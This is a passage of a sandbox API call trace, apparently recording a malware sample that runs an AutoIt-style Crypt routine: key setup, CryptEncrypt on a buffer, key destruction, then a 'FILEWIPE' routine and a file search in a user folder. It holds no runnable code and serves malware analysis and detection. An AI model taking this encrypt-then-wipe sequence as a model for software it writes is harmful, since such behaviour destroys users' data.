dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0188.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0188.075] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0188.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0188.076] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c26d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0188.076] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.076] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.076] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.076] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.076] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.076] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0188.076] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.076] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.076] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0188.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0188.076] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.076] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0188.076] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.076] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0188.077] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.077] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0188.077] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.077] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0188.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0188.077] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0188.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.077] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0188.077] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.079] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.079] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xa7a0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xa7b0) returned 1 [0188.079] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.079] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0188.079] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.079] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.079] CharLowerBuffW (in: lpsz="byte[42929]", cchLength=0xb | out: lpsz="byte[42929]") returned 0xb [0188.079] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.081] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.081] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.081] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.082] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.082] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa7a0, dwBufLen=0xa7b0 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa7b0) returned 1 [0188.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0188.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.100] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.100] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.100] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.100] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0188.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.100] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.100] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.101] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.101] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0188.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0188.101] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.101] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.101] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.101] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0188.101] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0188.101] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.107] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.107] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0188.107] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.111] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.111] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.111] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0188.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.111] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.111] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0188.112] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0188.112] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.112] CryptDestroyKey (hKey=0x90aed8) returned 1 [0188.112] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.112] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.112] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0188.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0188.112] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.112] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0188.112] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0188.113] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0188.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0188.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0188.113] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.113] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0188.113] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0188.113] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0188.113] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.113] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.113] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.113] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.113] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0188.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.113] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.113] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.114] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.114] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0188.114] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.114] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.114] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0188.114] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.114] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.114] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0188.114] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0188.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.114] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0188.114] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.114] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0188.114] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.115] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.115] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0188.115] FreeLibrary (hLibModule=0x74f20000) returned 1 [0188.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0188.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0188.115] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0188.115] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0188.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0188.115] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.115] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.116] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.117] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.117] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0188.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0188.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.117] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.117] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.117] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 